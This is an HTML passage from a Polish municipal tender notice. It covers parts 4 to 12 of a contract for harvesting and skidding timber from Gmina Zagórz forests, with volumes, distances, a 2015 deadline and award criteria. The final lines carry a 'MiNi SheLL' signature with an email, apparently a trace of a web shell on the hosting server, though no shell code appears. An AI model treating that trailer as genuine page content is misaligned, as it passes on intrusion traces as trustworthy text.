<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Morochów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-3 km, w ilości 100 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Olchowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-2 km, w ilości 160 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Poraż.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-3 km, w ilości 300 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Średnie Wielkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 0,5-2,5 km, w ilości 60 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Tarnawa Dolna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 0,5-2 km, w ilości 130 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Tarnawa Górna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-2 km, w ilości 200 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w miejscowości Zagórz - Osiedle Wielopole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-3 km, w ilości 700 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie Zahutyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 1-2 km, w ilości 250 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy.Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w sołectwie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pozyskanie i zrywka drewna z lasów mienia Gminy Zagórz w miejscowości Zagórz - Osiedle Zasław za Torami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zrywka drewna na skład przejściowy w odległości od 0,5-1 km, w ilości 100 m3. Szczegółowy opis wykonania przedmiotu zamówienia ujęty został w załączniku nr 4 do SIWZ. Podane ilości drewna do pozyskania i zerwania przewidziane do realizacji w okresie obowiązywania umowy są szacunkowe i mogą ulec zwiększeniu bądź zmniejszeniu w ilości zamówienia do 25% bez konieczności zawierania nowej umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.21.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com